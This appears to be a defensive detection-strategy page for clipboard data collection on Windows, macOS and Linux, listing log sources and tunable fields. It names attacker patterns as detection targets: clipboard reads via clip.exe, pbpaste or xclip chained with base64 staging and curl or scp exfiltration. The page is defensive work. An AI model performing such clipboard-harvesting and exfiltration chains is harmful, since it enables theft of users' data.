Detection of clipboard access via OS utilities (e.g., clip.exe, Get-Clipboard) by non-interactive or abnormal parent processes, potentially chained with staging or exfiltration commands.
| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | WinEventLog:Sysmon | EventCode=1 |
| Process Access (DC0035) | WinEventLog:Sysmon | EventCode=10 |
| Field | Description |
|---|---|
| TimeWindow | Defines how far back to look for parent-child relationships and follow-on network activity. |
| UserContext | Filters based on service vs interactive users to reduce noise. |
| ParentProcessName | Tunable list of expected/benign clipboard accessors. |
Detection of pbpaste/pbcopy clipboard access by processes without terminal sessions or linked to launch agents, potentially staged for collection.
| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | macos:unifiedlog | process |
| Field | Description |
|---|---|
| ExecutionChainLength | How many chained or embedded processes to track for correlation. |
| TerminalSession | Whether the pbpaste/pbcopy action is tied to a user terminal. |
| BinaryPath | Adjust if clipboard tooling is relocated (e.g., /opt/empyre/pbpaste). |
Detection of xclip or xsel access to clipboard buffers outside of user terminal context, especially when chained to staging (gzip, base64) or network exfiltration (curl, scp).
| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | auditd:SYSCALL | execve |
| Field | Description |
|---|---|
| ClipboardCommand | Tool used (xclip, xsel, custom clipboard-read binary). |
| CorrelationWindow | Temporal window to chain staging or network activity with clipboard access. |
| TTYLinked | Was access linked to interactive user TTY? |